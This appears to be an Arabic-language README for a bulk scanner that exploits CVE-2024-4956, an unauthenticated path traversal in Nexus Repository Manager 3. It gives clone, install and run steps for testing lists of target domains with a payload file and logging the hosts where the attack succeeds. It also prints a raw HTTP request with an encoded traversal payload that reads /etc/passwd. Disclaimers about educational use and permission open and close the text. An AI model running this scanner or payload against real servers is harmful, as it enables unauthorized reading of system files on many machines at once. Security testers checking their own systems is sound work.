
[CVE-2024-4956] Nexus Repository Manager 3 ماسح ضوئي جماعي لاجتياز المسار بدون مصادقة
هذه الأداة مخصصة للأغراض التعليمية فقط وللاختبار في بيئات الشركات. https://twitter.com/nav1n0x/ و https://github.com/ifconfig-me لا يتحملان أي مسؤولية عن سوء استخدام هذا الكود. استخدمها على مسؤوليتك الخاصة. لا تهاجم هدفًا ليس لديك إذن بالتعامل معه. تستخدم هذه الأداة الحمولة المنشورة علنًا.
يساعد هذا الماسح عشاق الأمن في فحص ثغرة اجتياز المسار (Path Traversal) في أهداف مستودع Nexus بشكل شامل.
سيعرض الماسح عدد الأهداف المحملة وحالة المسح الحالي. سيتم سرد عناوين URL مع ثلاث رسائل حالة: مهلة (Timeout)، فشل (Fail)، أو نجاح (Success)، بناءً على النتائج. تأكد من أن targets.txt يحتوي على قائمة النطاقات و lfi-payloads.txt يحتوي على قائمة الحمولات. سيعرض الماسح عنوان URL الحالي الذي يتم اختباره، مع التحديث لكل طلب جديد، ويشير إلى النجاح أو الفشل على التوالي. كما يحفظ البرنامج النصي قائمة بعناوين URL الناجحة في الدليل باسم successful_urls.txt. سيوفر ملخصًا لعدد المحاولات الناجحة في النهاية.
تأكد من تثبيت Python 3.6+ و .
pipاستنساخ المستودع:
git clone https://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner.gitcd CVE-2024-4956-Bulk-Scannerتثبيت التبعيات المطلوبة:
pip install -r requirements.txt
قم بإعداد ملف targets.txt مع قائمة النطاقات و lfi-payloads.txt مع قائمة الحمولات.
تشغيل الماسح:
python3 CVE-2024-4956-scanner.py -d targets.txt -p lfi-payloads.txt
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: target.com:8081
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close


هذه الأداة مخصصة للأغراض التعليمية فقط وللاختبار في بيئات الشركات. https://twitter.com/nav1n0x/ و https://github.com/ifconfig-me لا يتحملان أي مسؤولية عن الكود. استخدمها على مسؤوليتك الخاصة. لا تهاجم هدفًا ليس لديك إذن بالتعامل معه.